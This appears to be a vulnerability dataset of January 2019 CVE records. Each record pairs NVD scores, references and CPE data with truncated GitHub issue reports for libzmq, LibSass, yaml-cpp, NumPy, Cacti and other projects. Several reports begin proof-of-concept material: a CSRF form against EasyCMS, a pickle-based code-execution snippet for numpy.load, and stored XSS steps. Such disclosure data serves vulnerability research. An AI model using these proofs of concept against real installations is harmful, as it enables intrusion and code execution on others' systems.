{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "COMPLETE", "baseScore": 9, "confidentialityImpact": "COMPLETE...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/zeromq/libzmq/issues/3351" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/zeromq/libzmq/releases...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:zeromq:libzmq:*:*:*:*:*:*:*:*", "matchCriteriaId": "79DFA925-B69B-4DFB-B33F-8B8AC4A692E3", "versionEndExcluding": null, "versionEndIncluding": "4.2.5", "versionStartExcluding...
[ "190" ]
190
https://github.com/zeromq/libzmq/issues/3351
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "zeromq", "libzmq" ]
# Bug details In ```src/v2_decoder.cpp zmq::v2_decoder_t::eight_byte_size_ready()```, the attacker can provide an ```uint64_t``` of his choosing: ```cpp 85 int zmq::v2_decoder_t::eight_byte_size_ready (unsigned char const *read_from_) 86 { 87 // The payload size is encoded as 64-bit unsigned integer. ...
Remote code execution vulnerability
https://api.github.com/repos/zeromq/libzmq/issues/3351/comments
7
2019-01-08T14:15:33Z
2019-01-13T14:47:47Z
https://github.com/zeromq/libzmq/issues/3351
396,925,193
3,351
37
CVE-2019-6256
2019-01-14T08:29:00.427
A Denial of Service issue was discovered in the LIVE555 Streaming Media libraries as used in Live555 Media Server 0.93. It can cause an RTSPServer crash in handleHTTPCmd_TunnelingPOST, when RTSP-over-HTTP tunneling is supported, via x-sessioncookie HTTP headers in a GET request and a POST request within the same TCP se...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/rgaufman/live555/issues/19" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-l...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:live555:live555_media_server:0.93:*:*:*:*:*:*:*", "matchCriteriaId": "948E5448-F51A-4C86-BDC8-947815B725A9", "versionEndExcluding": null, "versionEndIncluding": null, "versio...
[ "755" ]
755
https://github.com/rgaufman/live555/issues/19
[ "Exploit", "Third Party Advisory" ]
github.com
[ "rgaufman", "live555" ]
ISSUE DESCRIPTION ================= The project website : http://www.live555.com/liveMedia/ I found a new way to make RTSPServer crash in lastest version 0.93 when RTSP-over-HTTP tunneling is supported. I only need to send two HTTP requests in one TCP connection. The problem occurrs in RTSPServer.cpp:853 ,...
There is a Denial of service attack issue that can cause program to crash in LIVE555 Media Server version 0.93.
https://api.github.com/repos/rgaufman/live555/issues/19/comments
3
2019-01-14T02:37:30Z
2019-03-04T09:59:15Z
https://github.com/rgaufman/live555/issues/19
398,730,939
19
38
CVE-2019-6283
2019-01-14T22:29:00.280
In LibSass 3.5.5, a heap-based buffer over-read exists in Sass::Prelexer::parenthese_scope in prelexer.hpp.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Broken Link" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00047.html" }, { "source": "cve@mitre.org", "tags": [ "Broken Link" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-07/...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:sass-lang:libsass:3.5.5:*:*:*:*:*:*:*", "matchCriteriaId": "33F93E15-A191-40F7-BADA-F4EE73DA6F7B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcl...
[ "125" ]
125
https://github.com/sass/libsass/issues/2814
[ "Exploit", "Third Party Advisory" ]
github.com
[ "sass", "libsass" ]
A heap-buffer-overflow in prelexer.hpp:70:14 in Sass::Prelexer::parenthese_scope(char const*) Compile and reproduce: `CC=afl-clang-fast CXX=afl-clang-fast++ AFL_USE_ASAN=1 make -C sassc -j4` ldd: $ ldd sassc linux-vdso.so.1 => (0x00007fffc6365000) libdl.so.2 => /lib/x86_64-linux-gnu/libdl.s...
AddressSanitizer: heap-buffer-overflow /home/eack/libsass/src/prelexer.hpp:69:14 in Sass::Prelexer::parenthese_scope(char const*)
https://api.github.com/repos/sass/libsass/issues/2814/comments
2
2019-01-14T05:26:25Z
2020-06-20T23:21:34Z
https://github.com/sass/libsass/issues/2814
398,753,003
2,814
39
CVE-2019-6284
2019-01-14T22:29:00.343
In LibSass 3.5.5, a heap-based buffer over-read exists in Sass::Prelexer::alternatives in prelexer.hpp.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Broken Link" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00047.html" }, { "source": "cve@mitre.org", "tags": [ "Broken Link" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-07/...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:sass-lang:libsass:3.5.5:*:*:*:*:*:*:*", "matchCriteriaId": "33F93E15-A191-40F7-BADA-F4EE73DA6F7B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcl...
[ "125" ]
125
https://github.com/sass/libsass/issues/2816
[ "Exploit", "Third Party Advisory" ]
github.com
[ "sass", "libsass" ]
A heap-buffer-overflow in prelexer.hpp:69:14 in char const* Sass::Prelexer::alternatives<&Sass::Prelexer::hexa, &(char const* Sass::Prelexer::sequence<&(char const* Sass::Prelexer::exactly<(char)40>(char const*)), &(char const* Sass::Prelexer::skip_over_scopes<&(char const* Sass::Prelexer::exactly<(char)40>(char const*...
AddressSanitizer: heap-buffer-overflow
https://api.github.com/repos/sass/libsass/issues/2816/comments
1
2019-01-14T06:46:57Z
2019-04-15T06:43:12Z
https://github.com/sass/libsass/issues/2816
398,765,964
2,816
40
CVE-2019-6285
2019-01-14T22:29:00.390
The SingleDocParser::HandleFlowSequence function in yaml-cpp (aka LibYaml-C++) 0.6.2 allows remote attackers to cause a denial of service (stack consumption and application crash) via a crafted YAML file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/jbeder/yaml-cpp/issues/660" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github....
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:yaml-cpp_project:yaml-cpp:0.6.2:*:*:*:*:*:*:*", "matchCriteriaId": "E8693389-E1C8-4A1F-B142-E1CA51BE82D2", "versionEndExcluding": null, "versionEndIncluding": null, "versionS...
[ "674" ]
674
https://github.com/jbeder/yaml-cpp/issues/660
[ "Exploit", "Third Party Advisory" ]
github.com
[ "jbeder", "yaml-cpp" ]
Stack Overflow in SingleDocParser::HandleFlowSequence(YAML::EventHandler&) () position:[code](https://github.com/jbeder/yaml-cpp/blob/b87c76a2ef4f974e2739a2d410ee5e36122cfc00/src/singledocparser.cpp#L183) [poc](https://github.com/jbeder/yaml-cpp/files/2754280/crash0.zip) To reproduce: `./parse < crash0` gdb...
Stack Overflow in SingleDocParser::HandleFlowSequence(YAML::EventHandler&) ()
https://api.github.com/repos/jbeder/yaml-cpp/issues/660/comments
8
2019-01-14T07:58:28Z
2020-04-09T18:02:11Z
https://github.com/jbeder/yaml-cpp/issues/660
398,780,528
660
41
CVE-2019-6286
2019-01-14T22:29:00.437
In LibSass 3.5.5, a heap-based buffer over-read exists in Sass::Prelexer::skip_over_scopes in prelexer.hpp when called from Sass::Parser::parse_import(), a similar issue to CVE-2018-11693.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00047.html" }, { "source": "cve@mitre.org", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00051.html" }, { "source": "cve@mit...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:sass-lang:libsass:3.5.5:*:*:*:*:*:*:*", "matchCriteriaId": "33F93E15-A191-40F7-BADA-F4EE73DA6F7B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcl...
[ "125" ]
125
https://github.com/sass/libsass/issues/2815
[ "Exploit", "Third Party Advisory" ]
github.com
[ "sass", "libsass" ]
A heap-buffer-overflow in prelexer.hpp:69:14 in char const* Sass::Prelexer::skip_over_scopes<&(char const* Sass::Prelexer::exactly<(char)40>(char const*)), &(char const* Sass::Prelexer::exactly<(char)41>(char const*))>(char const*, char const*) Compile and reproduce: `CC=afl-clang-fast CXX=afl-clang-fast++ AFL_USE_...
AddressSanitizer: heap-buffer-overflow
https://api.github.com/repos/sass/libsass/issues/2815/comments
1
2019-01-14T06:39:46Z
2019-04-15T06:43:12Z
https://github.com/sass/libsass/issues/2815
398,764,663
2,815
42
CVE-2019-6292
2019-01-15T00:29:00.477
An issue was discovered in singledocparser.cpp in yaml-cpp (aka LibYaml-C++) 0.6.2. Stack Exhaustion occurs in YAML::SingleDocParser, and there is a stack consumption problem caused by recursive stack frames: HandleCompactMap, HandleMap, HandleFlowSequence, HandleSequence, HandleNode. Remote attackers could leverage th...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/jbeder/yaml-cpp/issues/657" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github....
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:yaml-cpp_project:yaml-cpp:0.6.2:*:*:*:*:*:*:*", "matchCriteriaId": "E8693389-E1C8-4A1F-B142-E1CA51BE82D2", "versionEndExcluding": null, "versionEndIncluding": null, "versionS...
[ "674" ]
674
https://github.com/jbeder/yaml-cpp/issues/657
[ "Exploit", "Third Party Advisory" ]
github.com
[ "jbeder", "yaml-cpp" ]
Hi there, An issue was discovered in singledocparser.cpp, as distributed in yaml-cpp v0.6.2. Stack Exhaustion occurs in the YAML::SingleDocParser, and there is a stack consumption problem caused by recursive stack frames: HandleCompactMap, HandleMap, HandleFlowSequence, HandleSequence, HandleNode. Here is the POC...
Recursive Stack Frames: HandleCompactMap, HandleMap, HandleFlowSequence, HandleSequence, HandleNode
https://api.github.com/repos/jbeder/yaml-cpp/issues/657/comments
4
2019-01-02T14:29:02Z
2024-03-04T15:57:49Z
https://github.com/jbeder/yaml-cpp/issues/657
395,264,845
657
43
CVE-2019-6293
2019-01-15T00:29:00.523
An issue was discovered in the function mark_beginning_as_normal in nfa.c in flex 2.6.4. There is a stack exhaustion problem caused by the mark_beginning_as_normal function making recursive calls to itself in certain scenarios involving lots of '*' characters. Remote attackers could leverage this vulnerability to cause...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/westes/flex/issues/414" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:westes:flex:2.6.4:*:*:*:*:*:*:*", "matchCriteriaId": "102A6858-CA8E-4679-9806-0851B19327EC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding"...
[ "674" ]
674
https://github.com/westes/flex/issues/414
[ "Exploit", "Third Party Advisory" ]
github.com
[ "westes", "flex" ]
Hi there, An issue was discovered in function mark_beginning_as_normal in nfa.c, as distributed in flex 2.6.4. There is a stack exhaustion problem caused by the in mark_beginning_as_normal function making recursive calls to itself in certain scenarios involving lots of '*' characters. Here is the POC file. Please...
Stack Comsumption Problem Caused By the mark_beginning_as_normal Function Making Recursive Calls to Itself
https://api.github.com/repos/westes/flex/issues/414/comments
3
2019-01-09T07:06:10Z
2023-06-13T12:48:27Z
https://github.com/westes/flex/issues/414
397,238,545
414
44
CVE-2019-6294
2019-01-15T14:29:00.220
An issue was discovered in EasyCMS 1.5. There is CSRF via the index.php?s=/admin/articlem/insert/navTabId/listarticle/callbackType/closeCurrent URI.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/TeamEasy/EasyCMS/issues/8" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.c...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:easycms:easycms:1.5:*:*:*:*:*:*:*", "matchCriteriaId": "FF2DE269-B0B1-41F7-80C6-AC84FDB55764", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludin...
[ "352" ]
352
https://github.com/TeamEasy/EasyCMS/issues/8
[ "Exploit", "Third Party Advisory" ]
github.com
[ "TeamEasy", "EasyCMS" ]
After the administrator logged in, open the following page poc: one.html---add a user ```<html> <!-- CSRF PoC --> <body> <script>history.pushState('', '', '/')</script> <form action="http://127.0.0.1/EasyCMS-master/index.php?s=/admin/articlem/insert/navTabId/listarticle/callbackType/closeCurrent" ...
There is one CSRF vulnerability that can add the user account
https://api.github.com/repos/TeamEasy/EasyCMS/issues/8/comments
0
2019-01-15T09:48:11Z
2019-01-15T13:37:44Z
https://github.com/TeamEasy/EasyCMS/issues/8
399,263,747
8
45
CVE-2019-6439
2019-01-16T03:29:00.283
examples/benchmark/tls_bench.c in a benchmark tool in wolfSSL through 3.15.7 has a heap-based buffer overflow.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://www.securityfocus.com/bid/106640" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/wolfSSL/wolfssl/issues/20...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:wolfssl:wolfssl:*:*:*:*:*:*:*:*", "matchCriteriaId": "254F6CA5-6C83-4B6D-BB7D-BBD05A0A6620", "versionEndExcluding": null, "versionEndIncluding": "3.15.7", "versionStartExclud...
[ "787" ]
787
https://github.com/wolfSSL/wolfssl/issues/2032
[ "Patch", "Third Party Advisory" ]
github.com
[ "wolfSSL", "wolfssl" ]
Hi Team, ## Summary I have compiled wolfSSL using clang and a heap based buffer overflow is observed in `tls_bench.c` ## System info: `Linux zero 4.15.0-43-generic #46-Ubuntu SMP Thu Dec 6 14:45:28 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux` ## ASAN ``` ==4088==ERROR: AddressSanitizer: heap-buffer-overflow on...
heap-buffer-overflow [tls_bench+0x50ff15]
https://api.github.com/repos/wolfSSL/wolfssl/issues/2032/comments
4
2019-01-15T20:11:17Z
2019-03-14T21:55:01Z
https://github.com/wolfSSL/wolfssl/issues/2032
399,515,922
2,032
46
CVE-2019-6446
2019-01-16T05:29:01.370
An issue was discovered in NumPy 1.16.0 and earlier. It uses the pickle Python module unsafely, which allows remote attackers to execute arbitrary code via a crafted serialized object, as demonstrated by a numpy.load call. NOTE: third parties dispute this issue because it is a behavior that might have legitimate appli...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00091.html" }, { "source": "cve@mitre.org", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00092.html" }, { "source": "cve@mit...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:numpy:numpy:*:*:*:*:*:*:*:*", "matchCriteriaId": "80912416-97D8-4FF8-B2DB-D587EFC9D4BE", "versionEndExcluding": null, "versionEndIncluding": "1.16.0", "versionStartExcluding"...
[ "502" ]
502
https://github.com/numpy/numpy/issues/12759
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "numpy", "numpy" ]
numpy load function with evil data will cause command execution,if attack share evil data on internet, when user load it , it will cause command execution. ### Reproducing code example: ```python import numpy from numpy import __version__ print __version__ import os import pickle class Test(object): ...
numpy load function with evil data will cause command execution
https://api.github.com/repos/numpy/numpy/issues/12759/comments
32
2019-01-16T02:36:51Z
2021-11-30T14:38:45Z
https://github.com/numpy/numpy/issues/12759
399,622,174
12,759
47
CVE-2018-20723
2019-01-16T16:29:00.510
A cross-site scripting (XSS) vulnerability exists in color_templates.php in Cacti before 1.2.0 due to lack of escaping of unintended characters in the Name field for a Color.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00001.html" }, { "source": "cve@mitre.org", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00005.html" }, { "source": "cve@mit...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cacti:cacti:*:*:*:*:*:*:*:*", "matchCriteriaId": "1C7FEEA7-B141-4E6E-8B73-4DFF4844A341", "versionEndExcluding": "1.2.0", "versionEndIncluding": null, "versionStartExcluding":...
[ "79" ]
79
https://github.com/Cacti/cacti/issues/2215
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Cacti", "cacti" ]
**Description** - There's no escape being done before printing out the value of `Name` in the Color Template page. <br> **Cacti version** - v1.1.38 <br> **Steps to reproduce** - - Navigate to http://localhost:4040/cacti/color_templates.php?action=template_edit & add the below shared payload as the `Name`...
Stored XSS in "Name" field - Color
https://api.github.com/repos/Cacti/cacti/issues/2215/comments
1
2018-12-16T05:07:28Z
2020-06-30T05:31:09Z
https://github.com/Cacti/cacti/issues/2215
391,436,176
2,215
48
CVE-2018-20724
2019-01-16T16:29:00.557
A cross-site scripting (XSS) vulnerability exists in pollers.php in Cacti before 1.2.0 due to lack of escaping of unintended characters in the Website Hostname for Data Collectors.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00001.html" }, { "source": "cve@mitre.org", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00005.html" }, { "source": "cve@mit...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cacti:cacti:*:*:*:*:*:*:*:*", "matchCriteriaId": "1C7FEEA7-B141-4E6E-8B73-4DFF4844A341", "versionEndExcluding": "1.2.0", "versionEndIncluding": null, "versionStartExcluding":...
[ "79" ]
79
https://github.com/Cacti/cacti/issues/2212
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Cacti", "cacti" ]
**Description** - There's no escape being done before printing out the value of `Hostname` value in the Data collectors table. <br> **Cacti version** - v1.1.38 <br> **Steps to reproduce** - - Navigate to http://localhost/cacti/pollers.php?action=edit&id=1 & add the below shared payload as the `Hostn...
Stored XSS in "Website Hostname" field - Data Collectors
https://api.github.com/repos/Cacti/cacti/issues/2212/comments
1
2018-12-15T11:31:18Z
2020-06-30T05:31:10Z
https://github.com/Cacti/cacti/issues/2212
391,369,971
2,212
49
CVE-2018-20725
2019-01-16T16:29:00.620
A cross-site scripting (XSS) vulnerability exists in graph_templates.php in Cacti before 1.2.0 due to lack of escaping of unintended characters in the Graph Vertical Label.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00001.html" }, { "source": "cve@mitre.org", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00005.html" }, { "source": "cve@mit...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cacti:cacti:*:*:*:*:*:*:*:*", "matchCriteriaId": "1C7FEEA7-B141-4E6E-8B73-4DFF4844A341", "versionEndExcluding": "1.2.0", "versionEndIncluding": null, "versionStartExcluding":...
[ "79" ]
79
https://github.com/Cacti/cacti/issues/2214
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Cacti", "cacti" ]
**Description** - There's no escape being done before printing out the value of `Vertical Label` in the Graphic templates page. <br> **Cacti version** - v1.1.38 <br> **Steps to reproduce** - - Navigate to http://localhost:4040/cacti/graph_templates.php?action=template_edit&id=1 & add the below shared p...
Stored XSS in "Vertical Label" field - Graph
https://api.github.com/repos/Cacti/cacti/issues/2214/comments
1
2018-12-16T05:03:25Z
2020-06-30T05:31:09Z
https://github.com/Cacti/cacti/issues/2214
391,436,010
2,214
50
CVE-2018-20726
2019-01-16T16:29:00.697
A cross-site scripting (XSS) vulnerability exists in host.php (via tree.php) in Cacti before 1.2.0 due to lack of escaping of unintended characters in the Website Hostname field for Devices.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00001.html" }, { "source": "cve@mitre.org", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00005.html" }, { "source": "cve@mit...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cacti:cacti:*:*:*:*:*:*:*:*", "matchCriteriaId": "1C7FEEA7-B141-4E6E-8B73-4DFF4844A341", "versionEndExcluding": "1.2.0", "versionEndIncluding": null, "versionStartExcluding":...
[ "79" ]
79
https://github.com/Cacti/cacti/issues/2213
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Cacti", "cacti" ]
**Description** - There's no escape being done before printing out the value of `Hostname` value in the Tree table. <br> **Cacti version** - v1.1.38 <br> **Steps to reproduce** - - Navigate to http://localhost:4040/cacti/host.php?action=edit&id=1 & add the below shared payload as the `Hostname` field ...
Stored XSS in "Website Hostname" field - Devices
https://api.github.com/repos/Cacti/cacti/issues/2213/comments
1
2018-12-16T04:56:37Z
2020-06-30T05:31:08Z
https://github.com/Cacti/cacti/issues/2213
391,435,648
2,213
51
CVE-2019-6497
2019-01-20T20:29:01.180
Hotels_Server through 2018-11-05 has SQL Injection via the controller/fetchpwd.php username parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/FantasticLBP/Hotels_Server/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:hotels_server_project:hotels_server:*:*:*:*:*:*:*:*", "matchCriteriaId": "D4563754-E1ED-48E7-9B35-0CF85A93BC67", "versionEndExcluding": null, "versionEndIncluding": "2018-11-05", ...
[ "89" ]
89
https://github.com/FantasticLBP/Hotels_Server/issues/1
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "FantasticLBP", "Hotels_Server" ]
In controller/fetchpwd.php ![2019-01-19-225422_457x392_scrot](https://user-images.githubusercontent.com/44659204/51428565-08a49800-1c40-11e9-87b6-b9132c9f7dc9.png) the parameter was added with a string "username=" ,passed to function find In the definition of function find,we can notice that though the author us...
SQL Injection Vulnerability in controller/fetchpwd.php
https://api.github.com/repos/FantasticLBP/Hotels_Server/issues/1/comments
0
2019-01-19T15:20:53Z
2019-01-19T15:20:53Z
https://github.com/FantasticLBP/Hotels_Server/issues/1
401,005,444
1
52
CVE-2019-6498
2019-01-21T06:29:00.407
GattLib 0.2 has a stack-based buffer over-read in gattlib_connect in dbus/gattlib.c because strncpy is misused.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact":...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/labapart/gattlib/issues/81" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:labapart:gattlib:0.2:*:*:*:*:*:*:*", "matchCriteriaId": "A35BB1EA-4BCF-4A08-80FB-4B8C0E8846B4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludi...
[ "125" ]
125
https://github.com/labapart/gattlib/issues/81
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "labapart", "gattlib" ]
Hi Team, ## Summary While fuzzing **gattlib** using **clang 6.0** with ASAN a stack-based buffer-overflow was observed in [gattlib.c](https://github.com/labapart/gattlib/blob/master/dbus/gattlib.c#L222-L228) and [discover.c](https://github.com/labapart/gattlib/blob/master/examples/discover/discover.c#L38-L48) **...
stack-based bufferoverflow
https://api.github.com/repos/labapart/gattlib/issues/81/comments
0
2019-01-20T07:33:47Z
2019-03-05T12:11:51Z
https://github.com/labapart/gattlib/issues/81
401,071,122
81
53
CVE-2019-6498
2019-01-21T06:29:00.407
GattLib 0.2 has a stack-based buffer over-read in gattlib_connect in dbus/gattlib.c because strncpy is misused.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact":...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/labapart/gattlib/issues/81" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:labapart:gattlib:0.2:*:*:*:*:*:*:*", "matchCriteriaId": "A35BB1EA-4BCF-4A08-80FB-4B8C0E8846B4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludi...
[ "125" ]
125
https://github.com/labapart/gattlib/issues/82
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "labapart", "gattlib" ]
Hi Team, ## Summary While fuzzing **gattlib** using **clang 6.0** with ASAN a stack-based buffer-overflow was observed in [gattlib.c](https://github.com/labapart/gattlib/blob/master/dbus/gattlib.c#L222-L228) and [notification.c](https://github.com/labapart/gattlib/blob/master/examples/notification/notification.c#L5...
stack-based bufferoverflow
https://api.github.com/repos/labapart/gattlib/issues/82/comments
0
2019-01-20T07:45:43Z
2019-03-05T12:11:51Z
